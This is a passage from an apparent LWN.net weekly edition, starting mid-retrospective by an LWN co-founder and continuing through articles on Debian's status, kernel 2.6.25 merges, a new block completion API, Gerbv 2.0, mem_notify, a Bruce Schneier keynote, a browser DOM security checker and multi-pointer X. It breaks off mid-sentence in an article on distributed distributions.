is another important piece of why LWN is still going strong.

My take on the Red Hat Support fiasco:  I have no hard feelings.  
Although my work as a systems administrator had always included supporting
people and I had enjoyed the interaction, I had no idea what I was getting
into offering 24 hour support from my home.  Just as my daughter was
getting old enough to give me a full-night's sleep, I was getting
phone calls at 2am and 3am, having to wake up to a fully alert state
and go into emergency fix-it mode.  I'm surprised I survived until all
the contracts we had sold finally expired.  In the long run, Red Hat's
ideas gave us the courage to start our own business and since writing
for LWN was what I learned to love, I consider the end result to
have worked out for the best.  I also carefully noted for the future
that telephone support work was definite going to be a last resort
for any future career moves.

Meanwhile, since the few contracts we had didn't bring in enough to
pay the bills, let alone enough to support Jon's full-time entry, I
also did contract work as a technical writer, remote or on-site
administration of Linux for some local companies and I don't even
remember what else.  Eventually, Jon had to take the risk, forgo
waiting for a reliable income and quit his day job in order to
increase the income stream.  Note that his early work on LWN was
always done in addition to continuing his full-time job and trying to
increase our income stream at the same time.  No wonder he got grumpy
if I was out sick or worse, got to head to a fun Linux conference,
leaving him to pick up the slack!  Of course, it was terrifying in
turn for me when the situation reversed and Jon was unavailable.
Picking up the kernel page for the week?  Ack!  I didn't usually
complain.  Instead, I kept my head low, worked hard and hoped not to
see too many corrections or criticisms come in.

It was wonderful for both Jon and I when we were finally able to add
Becky to the mix.  I think initially we were only able to scrape up
enough to pay her for 10 hours a week, but every hour helped.  I haven't
forgotten, Becky (okay, it should be Rebecca, but she'll always be
Becky to me), the hours you put in at a very low rate of pay.  Of course,
we did pay you first -- the downside to being the business owners
for us.

Over the course of the next couple of years, we continued to bring
in our income from other sources.  We did actually initiate putting
some advertising on our site and it brought in a tiny amount of
money, but the bread and butter of the company continued to be contract work
done in addition to the weekly publication.  That included our
most successful side foray, building and teaching Linux classes.

What else did I love about LWN?  I so enjoyed the friendships I made
throughout so many different communities.  Will Rogers once said he
never met a man he didn't like.  Well, I've met many!  But truly,
in all the years I worked for LWN, I never met anyone I didn't like.
Sometimes people I liked said things or did things that I didn't like,
but underneath it, they were all good people, smart, idealistic and
very strongly opinionated.  That was part of what I liked and enjoyed,
so I never held people's opinions against them.

The conferences I attended and at which I spoke were like the
icing on the cake.  I got to meet in-person people I had only
come to know through newsgroups and mailing lists or occasionally
personal correspondence.  I got to meet even more people and
share in the excitement.  And yes, I do remember the late nights
going out for food, drink and conversation with you -- the Atlanta
Showcase, LinuxWorld San Jose, Embedded Systems Conference San Jose, 
LinuxWorld New York, the Colorado Linux Info Quest and 
the Singapore Linux Conference.  Each one provides me with
rich memories.  My trip out to Singapore was one high-point.
So many good and wonderful people and such a wonderful experience.
I thought it was to be the first of many international conferences that
I would be attending and I am still so sad that it was my last.
I particularly regret never making it out to any of early Linux
conferences in India, despite invitations.

Professionally, though, the highlight of the work was actually
developing myself as a journalist, rather than a computer expert.
I enjoyed researching more in-depth articles.  When rumors
floated my way, I loved actually going out and contacting the
people involved first hand by telephone -- short-circuiting 
email and the rest, to discuss the issues and get their first-hand
viewpoints.  Since our community wasn't exactly hounded by the
media back then, everybody actually wanted to talk to me and was more
than happy to give me the straight scoop, instead of just seeing themselves
misquoted elsewhere the next day, with the resultant flames.
Best of all, I was occasionally
able to get the sources of both sides of a controversy together and
talk.  I can think of at least twice where problems got resolved
as a result, people got together and I got the scoop on a story
the next day that had literally changed as a result of my work.
Very heady stuff.

Jon has already done an excellent job of covering our experience with
the dot-com bubble, so I won't add to his description.  It was truly a
unique life experience that we enjoyed to the fullest, knowing that
another like it was unlikely to come by us again.  We were very
fortunate in our decisions and I agree that the people at Tucows were
extremely good to us.

Well, at this point, all this happened a long time ago.  I had a great
time and regret nothing I did, only the things I didn't get time to
do.  For those who have asked after me personally, be assured that
health-wise, giving up my job was again the right choice at the right
time and I'm doing much, much better than I was in August of 2001.
You're still not likely to see me back any time in the near future.  I
focus my research skills now-a-days on tracking traditional and
alternative medical discoveries, implementing what seems good to me
and serving as an ad-hoc resource for other family members.  Oh yes,
and serving as a chauffeur to my daughter, who is now ten years old,
just as LWN is.  Take care, all of you, remember to be proud of what
you are achieving and *always* have fun doing it.  I stand by my
opinion that when work ceases to be fun, it is time for a change.

		LCA: The state of Debian


The Debian miniconf is one of the oldest of linux.conf.au traditions.  This
year, Martin Krafft was the person who - with short notice - got to lead
off this gathering with the "state of Debian" talk.  Debian, as always, is
an active project, and it seems that much is going well.


The Debian security team has grown over the last year.  Martin noted that
Debian, for all practical purposes, had no security support for a period
after the Etch Sarge release.  Those days are over, though, and Debian's security
support is, once again, solid.  There is now good security support for the
testing distribution as well; in fact, testing updates often come out
before those for the stable distribution.  That result comes from the fact
that testing updates do not need to support all architectures and there are
fewer embargo issues.


The upcoming Lenny release, it was noted, will have implemented most of the
features called for in the security-hardening specification.


The state of translations is good; Debian supports 58 languages now, and
may support 77 by the Lenny release.  The Smith Review
Project has 
been working through the package base, ensuring that package descriptions
are, well, descriptive, in proper English, and easily translatable.


On the ports side, the Sparc32 port has been officially retired; to the
dismay of relatively few users.  The Lenny release will include a new port:
Debian GNU/kFreeBSD, which is based on the FreeBSD kernel.  Martin thought
this port would appeal to those Debian users who have been complaining
about the increasing "multimedia orientation" of the Linux-based
distribution.


Much work is going into making the package repository more searchable.  The
debtags project, which is putting a set of standardized tags onto packages,
is relatively advanced.  This effort will address a number of longstanding
problems, like the fact that a search for "image editor" does not turn up
GIMP, which is an "image manipulation program."  Debtags will also make it
possible to search for packages which are related to other packages.  There
is also the apt-xapian-index
project, which is working toward 
indexing all package metadata and providing a fast search capability.


Other bits of current status: 


 The debian-med
     project - building a version of Debian aimed at the  
     medical industry - is headed toward a 1.0 release.

 The Debian mirror network is growing.  There are six new primary
     mirrors, and around 100 new secondary mirrors.

 Lenny will use UTF-8 nearly exclusively.  Developers are working on
     fixing the remaining packages which do not yet support UTF-8.

 The venerable dselect is almost retired.  There are still
     dselect users out there; Martin suggests that all of those
     folks move to aptitude.

 There are a lot of new games coming into the distribution.

 The Etch-and-a-half release will be happening soon.  This is a version
     of Etch which offers a 2.6.24 kernel - needed to make Etch work on
     newer hardware.  The original 2.6.18 kernel will remain an option for
     Etch users.


Looking forward to 2008, Martin noted that the Lenny release is currently
planned for December. Lots of emphasis on "planned" - given Debian's
history in this regard, few people actually expect the release to happen on
time.  Martin did say that things have been getting better in this regard,
with Etch being "only" four months behind schedule.  A Lenny release which
is only a couple months late seems feasible.


Something which is just coming into play is the new "Debian maintainer"
status.  Unlike full developers, maintainers cannot vote, have no access to
the debian-private list, and do not have much access to the wider Debian
infrastructure.  About all they really can do is upload a specific set of
packages.  So the "maintainer" designation is good for those who want to
maintain a small set of packages, but who are not looking to be an active
participant in Debian as a whole, and who do not want to run the "new
maintainer" gauntlet.


Martin was asked whether there was any thought of downgrading any existing
developers to maintainers.  He said that there was some interest in doing
that.  There are currently just over 1000 developers, all of whom have full
access to the repository.  Some 400 of those are inactive, but they still
possess a key which lets them make changes to the system; this is a clear
security issue.  The MIA project
is looking to identify these 
people and, eventually, move them to inactive status.  On the issue of
whether the project would be forcibly downgrading active developers who,
for whatever reason, are not entirely welcome in the community, Martin says
that will not be happening.  There is just no way to do it without bringing
massive disruption and flame wars, and nobody wants that.


There was also a question on the role of the debian-private list.  The
biggest use of debian-private, according to Martin, is vacation
announcements; developers need to let the project know that they will not
be around, but they do not wish to announce their absence to the wider
world.  There are some other discussions there too, of course.  Current
policy says that debian-private discussions will be disclosed after three
years in the absence of a request to the contrary.  There's an effort afoot
to disclose older traffic from before the adoption of that policy, but that
requires the assent of all of the participants.


The debian-women project, unfortunately, is currently stalled; the main
participants have not had the time to push things forward.  The
#debian-women channel remains active, though, and is generally a nice and
supportive place to be.  There are currently about twelve active female
contributors to Debian.  Martin thinks that women are becoming more present
in general, though, and he stated that "the Debian cowboy days are done."


On the packaging front: the packages.qa.debian.org 
site has been redone in "beautiful CSS."  There are now RSS feeds for those
who want to follow the status of specific packages.  A new
"LowThresholdNMU" flag has been added; this is essentially a statement on
the part of the maintainer that he will not get offended if others upload
fixes to the package.  Packages can now use bzip2 compression.  There has
also been a major rework of the shared library infrastructure, which now
looks at actual symbol use when determining shared library dependencies.
This change should make it possible to install individual packages from
testing into a stable system without having to update all of the libraries
that package uses.


There is a growing trend toward team maintenance, especially for the larger
package sets.  This approach increases the robustness of the system and
minimizes problems with MIA maintainers.  


Version control systems are working their way into the Debian
infrastructure.  Packages can now have a set of Vcs-* headers
which point to the upstream source repository; these can be used, for
example, with the debcheckout command to clone the source
repository without having to know anything about the source management
system used.  Version control systems also offer a solution to the current
problem of "hackish packaging tools" being used by many developers.  In the
future, source packages might just include a shallow repository which can
be fed straight to git (or some other system).  This project is stalled at
the moment, but Martin thinks it will go somewhere; it would be nice if the
distributors could come up with a common scheme that they can all use.


The final topic in this session was a question from the audience on whether
Debian might ever go to a shorter release cycle.  The projected 18 months
for Lenny seems like a step in that direction, but 18 months is still quite
a bit longer than the cycles used by many other free distributions.  Martin
thinks that going shorter is unlikely.  The fact of the matter is that
distribution upgrades are a hassle, requiring a fair amount of
administrative attention.  Ubuntu may have made some progress with its use
of upgrade scripts, but the basic problem remains.  On top of that, shorter
release cycles would necessarily lead to a shortening of the time for which
security updates are available for any specific release.  And that, in
turn, would force users into more frequent updates whether they want to do
that or not.  So one should not expect six-month release cycles from Debian
anytime soon.

		What got into 2.6.25


As of this writing, some 3800 patches have been merged into the mainline
git repository since the release of 2.6.24.  That is fewer than one might
have expected, but Linus's travel to linux.conf.au is slowing the process
somewhat.  Expect more than the usual amount of interesting stuff to be
merged relatively late in the merge window period.


User-visible changes include:


 New drivers have been added for Globe Trotter HSDPA wireless cards, 
     HIFN 795x crypto accelerator chips, Xceive xc2028 and xc5000 tuners,
     Cirrus Logic CS5345 analog-to-digital converters, several Beholder TV
     tuners, Syntek DC1125 cameras, Silicon Labs Si470x FM radio receivers, 
     Atmel AT91CAP9 processors, Qualcomm MSM7X00A processors, Marvell Orion
     system-on-a-chip devices, Marvell Feroceon processors, SuperH 7203 and
     7263 processors, SGI IP28 systems, R6040 Ethernet adapters, Broadcom
     NetXtremeII 10Gb network adapters, RTL8180 and 8185-based wireless
     network cards, Microchip EN28J60 Ethernet chips, and, finally, Atheros-based
     wireless network adapters.

 The Seagate ST-02/Future Domain TMC-8xx and PSI240i SCSI drivers have
     been removed due to lack of interest and maintenance.

 Salsa20 stream cipher support has been added to the crypto layer (at
     least for the x86 architecture - it's an assembly implementation).

 Some realtime work has gone into the scheduler; in particular, the
     kernel will be more aggressive about moving tasks between processors
     when multiple realtime tasks are contending for the same CPU.  The
     implementation of cpusets has been made to work more with the
     scheduler domains mechanism.  The option to make the big kernel lock
     preemptible has been made the default; eventually the non-preemptible
     version will go away altogether.  High-resolution timers can be used
     for preemption, making fair scheduling more accurate.  The group
     scheduling feature has been enhanced with realtime support.

 The Preemptible
     read-copy-update patches have been merged.

 Support for the LatencyTop
     utility has been merged.

 Kprobes support for the ARM architecture has been added.

 The new CLONE_IO flag to clone() causes I/O contexts
     (used in the CFQ block I/O scheduler) to be shared with the new child
     process. 

 The idle class for I/O scheduling has been changed to not be 100%
     idle when the device is busy; as a result, it is far less likely to
     cause priority inversion problems and is no longer limited to
     privileged processes.

 A long list of new ext4
     features, including large file support, (very) large filesystem
     support, journal checksumming, multi-block allocation, and more, has
     been added in. 

 The splice() system call now supports TCP receive streams. 

 Controller area network
     protocol support has been merged.

 The network traffic shaper, long obsolete and scheduled for removal,
     is gone.

 Quite a bit of work has been done on the network namespace code which
     was first merged in 2.6.24.  Extending namespace awareness through the
     entire networking subsystem is a big job which is, at this point,
     mostly complete.


Changes visible to kernel developers include:


 Chinese translations of a number of core kernel development 
     documents have been added to the tree.

 There have been a great many changes to the low-level device model
     APIs dealing with kobjects and ksets.  These changes have, in turn,
     forced a large number of adjustments throughout the tree.  See
     Documentation/kobject.txt for an
     overview of the new API.

 There is a new set of security module functions for dealing with
     filesystem mount and unmount operations.

 The chained scatterlist API has been augmented with the sg_table patches.

 There have been some changes to the block request completion API.  See
     this article for a
     description of the new way of doing things.


As of this writing, the merging process has just begun, so expect a long
list again next week.  Among other things, the x86 tree update, with 908
changesets, is waiting on the wings.  There is quite a bit of code yet to
be merged for this development cycle.

		A new block request completion API


The 2.6 block layer has traditionally provided a pair of functions by which
a driver could indicate that an I/O request had been completed.  A call to
end_that_request_first() signaled the transfer of a certain
amount of data and would return a value indicating whether the request as a
whole was complete.  Once all sectors in a request had been transferred, it
was up to the driver to pass the request to
end_that_request_last() for final cleanup.  There was also a
function called simply end_request() which might or might not end
the entire request, depending on how much data had been transferred.  This
API has worked for a long time, but it has occasionally proved confusing
for driver developers.  It was also hard for drivers to communicate useful
error information with this interface.
So, as of 2.6.25, there will be a new way for
drivers to indicate request completion.


After a block driver has transferred one or more sectors (or failed in the
attempt), it should now make a call to:


Where rq is the I/O request, error is zero or a negative
error code, and nr_bytes is the number of bytes successfully
transferred.  If blk_end_request() returns zero, the request is
fully processed and the driver can forget about it.  Otherwise there are
still sectors to be transferred and the driver should continue with the
same request.

blk_end_request() must acquire the queue lock to do its job.  If
the driver already holds that lock, it should call
__blk_end_request() instead.

Block drivers traditionally did a number of housekeeping tasks between
calls to end_that_request_first() and
end_that_request_last().  These include calling
add_disk_randomness() to contribute to the entropy pool, returning
any tags used with the request, and removing the request from the queue.
All of that stuff is now done within blk_end_request(), so drivers
can forget about it.  The occasional driver had to carry out other tasks
between the completion of the request and its removal from the queue.  For
drivers with this kind of special need, there is a separate function to
call:


In this version, drv_callback() will be called (without the queue
lock held) between the completion of the request and its final cleanup.  If
the callback returns a non-zero value, that final cleanup will not be
done.  This function will always acquire the queue lock - there is no
version for drivers which have already taken that lock.  In general,
though, the use of the callback functionality is likely to be a sign that
the driver is being tricker than it really needs to be.

This change was accompanied by a fair number of patches converting all
in-tree drivers to the new interface.  The old completion functions have
been removed, so out-of-tree drivers will need updating before they will
work with 2.6.25.

		Gerbv reaches the 2.0 release milestone


Gerbv (Gerber Viewer)
is a utility for displaying CAD files that are used in the manufacture
of electronic printed circuit boards:


Gerbv is a viewer for Gerber (RS-274X) files. It is one of the utilities affiliated with the gEDA project.
Gerber files are generated from PCB CAD systems and sent to PCB manufacturers as the basis for the manufacturing process. The standard supported by gerbv is RS-274X.


In the 1980s, computer generated
Gerber files
were used to drive photo-plotter machines made by by the Gerber Systems
Corporation. The photo plotters
used a mechanically stepped light source and rotating image wheels to optically imprint a image of a circuit board onto a large piece of film.
The film was then used to manufacture the printed circuit board.
Additionally, PCB manufacturing requires information for defining the
size and placement of drill holes (drill files).

<!-- LWNPutAdHere -->

The photo plotting
machines are now obsolete, but the Gerber standard remains as a
standard in the PCB manufacturing business.  The output from Gerber
file plots can look considerably different than the original CAD drawings,
making a visualization tool like Gerbv important.


Gerbv can be used for examining the CAD files generated by
such software as
CadSoft Eagle,
a popular commercial application with a freely downloadable hobby version.
Another Linux-compatible printed circuit CAD
application is PCB.
PCB is less powerful than Eagle, but is open-source software.
LWN examined PCB
a long time ago.


Version 2.0.0 of Gerbv was recently

announced:
"Gerbv release 2.0.0 represents a a whole new look for gerbv.  Most
importantly, the layer control GUI has been made much more powerful through
the outstanding work of Julian Lamb.  Julian has also re-worked the GUI's
button and menus to make them more  convenient to use.  We are certain that
you  will find gerbv-2.0.0 even easier to use than before because of Julian's amazing work!"


The feature list for Gerbv 2.0.0 now includes:

Display of RS-274x Gerber files. 
 The complete implementation of the current Gerber spec.
 Display of Excellon drill files.
 Display of XYRS pick-place files for surface mount technology.
 A completely redesigned GUI.
 Controls for zoom/pan and fit to screen.
 A measure tool for making mouse-controlled distance calculations.
 User selected display of the various layers.
 Support for transparency so that multiple layers can be viewed.
 Report windows showing Gerber and drill code stats and errors.
 A built-in print button.
 Use of the Cairo graphics library, enabling export of PDF, PS, SVG, and PNG files.
 Incorporation of a new unit test suite in the code.
 Improved file-type autodetection.
 Expanded configuration options for the build system.


The project's SourceForge

screenshot page gives several examples of Gerbv 2.0.0 in use.


Installation of Gerbv 2.0.0 was straightforward.  The source code was

downloaded, uncompressed and untared.
The standard Unix configure/make/make install steps were performed
on a Ubuntu Feisty Fawn system, no problems were encountered.


Gerbv 2.0.0 was tested on some Eagle CAD files that your author
had worked on in the past.  Startup was easy, running the command
gerbv slc1.* had the desired effect of pulling in all of the
various layers for the test project.  Moving and zooming around the
layers showed the CAD graphics in detail, as expected.
The analyze tools produced a lot of useful status information for
the various files.


Details in the
copper layers that did not show up in Eagle (version 4.16) were easily
seen with Gerbv. In the past, your author has encountered problems
with Eagle incorrectly displaying the placement and scaling of text on
the silk screen layer.
This showed up when CAD files were taken to a board manufacturer.
Gerbv displayed the text as it appears on the manufacturer's system,
which is the desired behavior.


The export functions were experimented with.  Export to a png file
worked as expected.  Export to a PostScript file caused Gerbv to
hang up.  Export to a PDF file took a very long time to complete, and
gpdf took a long time to load the file.  When gpdf finished rendering,
it only displayed large polygons that were barely visible due to
their almost identical colors. Export to svg produced a
file that caused the mirage image viewer to hang when reading.
An attempt to convert the svg file to a jpg file with convert
resulted in this error:

Clearly, this is still a .0.0 release with some bugs.
Despite these problems, Gerbv 2.0.0 is a tool that is useful, if not
critical, for performing Linux-based printed circuit board design.


		Avoiding the OOM killer with mem_notify


Having applications that use up all the available memory can be a fairly
painful experience.  For Linux systems, it generally means a visit from
the out-of-memory (OOM) killer, which will try to find processes to kill.
As one would guess, coming up with rules governing which process to kill is
challenging—someone, somewhere, will always be unhappy with
a choice the OOM killer makes.  Avoiding it altogether is the goal
of the mem_notify patch.


When memory gets tight, it is quite possible that applications have memory
allocated—often caches for better performance—that they
could free.  After all, it is generally better to lose some performance
than to face the consequences of being chosen by the OOM killer.  But,
currently, there is no way for a process to know that the kernel is feeling
memory pressure.  The patch provides a way for interested
programs to monitor the /dev/mem_notify file to be notified if
memory starts to run low.

 /dev/mem_notify is a character device that signals memory
pressure by becoming readable.  Interested programs can open the file and
then use poll() or select() to monitor the file
descriptor.  Alternatively, signal-driven I/O can be enabled via the
FASYNC flag and the system will deliver a SIGIO signal to the
process when the device becomes readable.  If it becomes readable, the
process should free any memory that it can afford to give up.  If enough
memory is freed this way, the kernel will have no need to call in the OOM
killer.  

The crux of the patch is how to decide that memory pressure is occurring.
mem_notify modifies shrink_active_list() to look for movement of
an anonymous page to the inactive list, which is an indication that some
will likely be swapped out soon.  When that occurs, 
memory_pressure_notify() (with the pressure flag set to 1) will be called for that zone.  When the
number of free pages for the zone increase above a threshold—based
on pages_high and lowmem_reserve for the
zone—memory_pressure_notify() is called again, but with the
pressure flag set to 0, effectively ending the memory pressure event for
that zone. 


If there are numerous processes waiting for a memory pressure notification,
it could be counterproductive to wake them all at once—the "thundering
herd" problem.  To combat this, the patch set adds the ability to wake
fewer processes than are waiting on the poll event, by adding the
poll_wait_exclusive() function.  poll_wait_exclusive()
will in turn call add_wait_queue_exclusive() so that a
member of the wake_up() family can be used that will limit the number of processes
woken up.  Previously, only poll_wait() was available, it uses
add_wait_queue(), which does not provide this ability.
Also, to reduce the frequency of processes waking up to reclaim memory,
memory_pressure_notify() will only do that once every five seconds.


The /proc/zoneinfo output has been changed to include the
mem_notify status.  This can be used by a human for diagnostic purposes or by a program to
 check the current status of zones for memory pressure.  


The embedded community has a lot of interest in seeing this feature get
added to the kernel.  Devices like phones and PDAs are often running close
to their memory limits and the OOM killer is currently unavoidable when the
user opens yet another application.  With this patch in place, programs
that use a lot of memory, but could get by with less, can be changed to
free up their caches and the like when memory gets tight.  As memory hungry
programs get changed, other users will
benefit as well.


The patch, submitted by Kosaki Motohiro, has been through several
iterations on linux-kernel.  The work was originally started by Marcelo
Tosatti, with the fifth version recently posted by Kosaki.  Previous
versions have been well received and with relatively few
comments on this iteration, it would seem to be getting close to being merged.


		LCA: Bruce Schneier on the two sides of security


The conference portion of linux.conf.au opened on Wednesday morning with a
keynote by Bruce Schneier.  LCA is a sold-out event; in fact, there are
rather more attendees than can be fit into the hall where the keynotes are
held.  Thus the room was packed, with the second-class citizens - those
with yellow badges who put off registration until late - watching a remote
feed in a separate room.  Those folks may have had a more distant
experience, but it was almost certainly a cooler one too.


Bruce's key point is that we need to rethink how we try to achieve
security, though it took a while to explain just why that is.  Security, he
says, has two components:


 The feeling of security: that which helps us to sleep well
     at night.

 The reality of security: whether we are, in fact, secure.


These two aspects of the problem are entirely separate from each other, but
they both have to be addressed if our security goals are to be achieved.

Security is always a set of tradeoffs which we are all making every day.
As an example, consider that, in all likelihood, nobody in the audience was
wearing a bulletproof vest.  It's not that the vests do not work; instead,
nobody feels that the cost of wearing a bulletproof vest is justified
given the risk.  On a bigger scale, the answer to the question of how to
prevent more 9/11-like attacks is clear: ban all aircraft.  In fact, that
was done in the US for a few days after those attacks, but, in the longer
term, that is not a tradeoff that people are willing to make.

So the fundamental question for any security tradeoff is: is it worth it?
As it happens, we are quite bad at making that decision.  We tend to
respond to feelings rather than reality.  Spectacular risks drive us more
than everyday risks.  We fear the strange over the familiar and the
personified (think Osama bin Laden) over the anonymous.  Involuntary risks
are seen as being bigger than those entered into voluntarily.  In the end,
evolution has equipped us quite well for making tradeoffs in the small
communities we lived in many, many thousands of years ago.  We are less
well equipped for the world we live in now.


Since we respond to feelings more than reality, there are strong economic
incentives for solutions which address feelings. The result is snake-oil
products and security theater.
Sometimes people notice that they are being 
sold bad security (later Bruce mentioned a US survey which indicated that
the Transportation Security Agency is now less trusted than the taxation
agency), but, all too often, they don't.  They have a poor understanding of
the risks and the costs involved, and there are plenty of people with
strong interests in confusing the issue.


The security market is a lemons
market, one where buyers and sellers have asymmetric access to
information.  Economic research shows that, in such markets, the bad
products tend to drive the good ones out of the market.  There is no easy
way to evaluate the work which has gone into the creation of a truly secure
product, so buyers respond to other, less reliable signals.  Things like
price, sales claims, or the Gartner Group.  These signals are sloppy and
prone to manipulation.  When security is outsourced to outside agencies -
governments, say - the problem gets even worse.


In the business world, information eventually brings some order to a lemons
market.  As businesses learn about what really works, access to information
evens out - though there is always a problem with very rare, high-cost
events where information is not available.  In the individual world,
though, it is much harder, because fear plays a much bigger role.


The fact of the matter is that fear is wired deeply into how we work - it
is a result of a very old part of our brain.  As humans, we have the
ability to override our fears when reason indicates that we should, but it
is a hard thing to do.  The default state is that fear rules.  So this is
Bruce's core point: the feelings matter.  All that security theater out
there is not entirely stupid; any security solution must address the fears
that people feel.  We must address both aspects of security.


The problem is where the feeling of security and the reality of security
diverge from each other.  If only feelings are addressed, security has not
really been achieved.  If only the reality of security is addressed, people
feel insecure and may make bad decisions.  Either way, the full problem has
not been solved.  Addressing this all-too-common problem is hard, though;
Bruce knows of no better way than the spreading of good information.


Your editor's perspective follows - nothing from this point on was said
during the talk.  It seems that he has a point here.  Consider some common
situations in the free software world:


 A large number of security updates from a distributor may be an
     indication that the reality of security is being achieved: problems
     are being found and fixed before they are exploited.  But all those
     updates can undermine the feeling of security.  The seemingly endless
     stream of Wireshark updates is a case in point; most of these problems
     are found through proactive auditing by the developers and have never
     been exploited by the Bad Guys.  But the feeling of insecurity
     associated with Wireshark can be strong.  This feeling can push users
     toward other software which, while not having that long history of
     security updates, is actually less secure.

 A system running SELinux may, in fact, be highly secure.  But many
     administrators still turn it off.  SELinux does not make them
     feel secure because they do not understand it, and they fear
     (rightly or wrongly) that it will interfere with the proper operation
     of the system.  But, by turning it off, they undoubtedly expose
     themselves to a number of attacks which SELinux would block.


We should hear Bruce's point and think a bit more about how we can ensure
that free software creates the feeling of security - but a feeling which is
backed up by real security.  It's a hard problem, one which lacks technical
solutions.  But we'll find ourselves less secure than we would otherwise be
if we do not address that side of the issue.

		Finding bugs lurking in the DOM


The Document Object Model (DOM) for
HTML is quite useful for handling a variety of dynamic effects for web
pages, but it is complex.  It interacts with Javascript and CSS (or they
with it) in ways
that are sometimes surprising—the DOM has often been the source of browser
bugs.  A new project, from well-known DOM  bug finder
Michal Zalewski, seeks to systematically exercise the DOM in browsers to
eliminate as many holes as it can.

 The project, with the unassuming name of DOM access checker (or
dom-checker) was just announced
on the full-disclosure mailing list (along with Bugtraq and others).
Zalewski and colleague Filipe Almeida, both of Google, describe their tool
as follows: 
 DOM access checker is a tool designed to
automatically validate numerous aspects of domain security policy
enforcement (cross-domain DOM access, Javascript cookies, XMLHttpRequest
calls, event and transition handling) to detect common security attack or
information disclosure vectors.  


The checker consists of a three HTML files and a Javascript configuration
file that can be loaded from the internet via HTTP (a live version is available from
the project website) or from the local disk, using the file://
protocol.   Ideally, they should be loaded from both places and give the
same results.  The screenshot for a sample run using Firefox 3
(Fedora/3.0b3pre-0.beta2.12.nightly20080121.fc9 for the curious) is at left.


After pressing the "Click here to begin tests" button, the Javascript test
harness runs 15 major tests, each with many separate subtests.  Each
subtest reports success or failure to the screen as it runs.  Firefox 3
failed 15 of the 1500 or so checks in the standard set of tests.  


According
to the announcement, "DOM Checker had been used to find a number of
major security bypass and information disclosure problems in several
popular browsers."  Zalewski and Almeida worked with the browser
teams to resolve the most serious issues.
But, common browsers will still fail up to 30 of the
less important tests—for privacy, rather than
security, holes.


The hope is that the browser vendors pick up these tests to use as part of
their quality assurance process.  They could also be used for regression
testing to find problems that have crept in while fixing other bugs or
adding new features.  The checker is a framework that could easily be
extended with additional tests covering other areas of DOM functionality.
With the advent of AJAX, DOM
manipulations via Javascript
are being used more and more by web sites, so tools to discover these kinds
of bugs are welcome. 


		LCA: Bringing X into a two-handed world


Our graphical interfaces, as implemented through the X Window System, are
designed around a single keyboard and a single mouse.  But humans are
social creatures who want to work together and share systems; they also
tend to design their activities around the fact that we have two hands.
Moving X out of the single-device model is not a task for the faint of
heart, but Peter Hutterer is making a go of it.  His LCA talk on
multi-pointer X was an
interesting update on where this work stands.


The X device model is based on the idea of a core keyboard and a core
pointer.  Even in a situation where multiple input devices are present (a
second mouse plugged into a laptop, say), the application still only sees a
single, core device.  There is no way to tell, using these core devices,
which physical device generated any given event.  This, of course, will be
an obstacle for any application wanting to provide multi-device support.

As it happens, the XInput extension has
provided basic 
multiple-device support  for many years.  XInput events look much like core
device events, except that (1) applications must register to receive
them separately, and (2) they include an ID number identifying the
device which generated the event.  XInput does not solve the problem by
itself, though, for a couple of reasons.  Beyond the fact that it does not
provide a way for users to specify how different devices should be handled,
XInput suffers from the little difficulty that approximately 100% of X
applications do not make use of it.  So nobody is listening to all those
nice XInput events with associated device IDs.  The one exception Peter
mentioned is the
GIMP, which uses XInput to deal with tablets.


Of course, multiple devices work on current systems; that is because the X
server also generates core events for all devices.  That causes the device
ID to be lost, but, since applications do not care, this is not a problem,
for now.  But it does mean that we are still stuck in a world where systems have
a single pointer and a single keyboard.


Luckily for us, says Peter, multi-pointer X is on the horizon.  MPX extends
X through the creation of the concept of "master" and "slave" devices.
Master devices are those which generate events seen by MPX-aware clients;
they are virtual devices which can be created and destroyed by the user at
will.  Slave devices, instead, correspond to the physical devices attached
to the system.  Through the use of a modified xinput command,
users can create masters and attach specific slaves to them.


In the MPX world, one of three things will happen whenever something is
done with a physical (slave) device:


 The X server will create an XInput event from the slave device and 
     deliver it to any applications which have asked for such events.

 If that event is not delivered (because nobody was interested), a core
     event from the associated 
     master device is created and queued for delivery.

 If the event is still undelivered, the server will create an
     XInput event from the master device to which the slave is attached and
     attempt to deliver that.


The end result is a scheme where multiple devices still work as expected
with non-MPX-aware applications.  But when an application which does take
advantage of MPX shows up, it will have access to the real information about what
the user is doing.

 
Peter ran a demo of some of the things he was able to do.  By default,
there is still only one pointer and one keyboard.  Once a new master is
created, though, and slave devices attached to it, things get more
interesting.  Two mouse pointers exist on the screen, each of which can be used
independently.  It's possible to be typing into two separate windows at the
same time.  Or, with the right window manager, the user can move windows
simultaneously, or resize a window by grabbing two corners at the same
time.  It was great fun to watch.


MPX brings with it an API which can be used with multi-device
applications.  When applications use it, says Peter, the result is "eternal
happiness."  That just leaves the problem of "the other 100%" of the
application base which lacks this awareness.  To a certain extent, things
just work, even when independent pointers are used in the same
application.  There are some exceptions, though, which have required some
workarounds in the system.


For example, applications typically respond when the pointer enters a
specific window - illuminating a button within the application, for
example.  Things work fine when two pointers enter that button.  But,
likely as not, once the first pointer leave the button, it will go dark and
refuse to respond to events from the other pointer.  The solution is to
nest enter and leave events, so that only the first entry is reported to
the application, and only the final exit.  Another problem results when a
mouse button is pushed while another button is being held down (for a drag operation,
perhaps) on a different device.  Do that within Nautilus, and the
application simply locks up - not the eternal happiness Peter was hoping
for.  So, when the application holds a grab on one 
device (as happens when buttons are held down), no other button events will
be reported.  Also problematic is what to do when the application asks
where the pointer is: which pointer should be reported?  In this case, the
server simply assigns one pointer as the one to report on.  All of this
makes standard applications work - almost all the time.


Some interesting problems remain, though.  How, for example, should a
window manager place new windows in a multi-user, multi-device situation?
Users will want their windows in their part of the display space, but the
window manager has no real way of knowing where that is - or even which
user the window "belongs" to.  In general, the
whole paradigm under which desktop applications have been developed is
unprepared to deal with a multi-device world.


Things will get worse as more types of input devices enter the picture.
Touch screens are bad enough; they have no persistent state, so things
change every time the user touches the device.  But touch screens of the
future will report multiple touch points simultaneously, and each of those
will have attributes like the area of the touch, the pressure being
applied, etc.  Perhaps the device will sense elevation - a third dimension
above the device itself.  

All of this is going to require a massive rethinking of how our
applications work.  There are going to be a lot of big problems.  But that,
says Peter, is what happens when one explores new areas.  One gets the
sense that he is looking forward to the challenge.

		LCA: Disintermediating distributions


One of the mini-confs which happened ahead of linux.conf.au proper was the
"distribution summit," meant to be a place where representatives and users
of all distributions could talk about issues of interest to all.  The
highlight of this event, perhaps, was Jeff Waugh's talk on
disintermediating distributions - or, as he rephrased it, "distributed
distributions."  If his ideas take hold, they could be the beginning of a
new relationship between free software projects and their users.


It all started, says Jeff, some years ago, when he ran into Mark
